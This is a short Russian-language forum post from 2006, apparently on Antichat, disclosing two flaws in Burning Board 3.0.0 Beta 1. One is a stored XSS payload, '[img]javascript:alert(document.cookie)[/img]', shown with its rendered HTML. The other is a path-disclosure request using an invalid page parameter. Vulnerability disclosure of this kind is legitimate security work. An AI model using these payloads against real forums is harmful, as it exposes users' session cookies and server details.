Форумы Burning Board 3.0.0 Beta 1

Discussion in 'Уязвимости CMS/форумов' started by Goudini, 14 Dec 2006.

  1. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Вот что я надыбал в Burning Board 3.0.0 Beta 1

    1. Активная XSS прямо в сообщении

    Code:
    [img]javascript:alert(document.cookie)[/img]
    заменяеться на
    Code:
    <img src="java&[COLOR=White][B]*[/B][/COLOR]#115;cript:alert(document.cookie)" class="resizeImage" alt="" />
    и куки у нас в алерте :)

    2. Раскрытие пути


    При подстановке неверного значения в переменную $_GET["page"] выдаеться сообщение об ошибке
    Code:
    index.php?page=Bugaga
    Можно узнать полный путь к форуму
     
    #1 Goudini, 14 Dec 2006
    2 people like this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.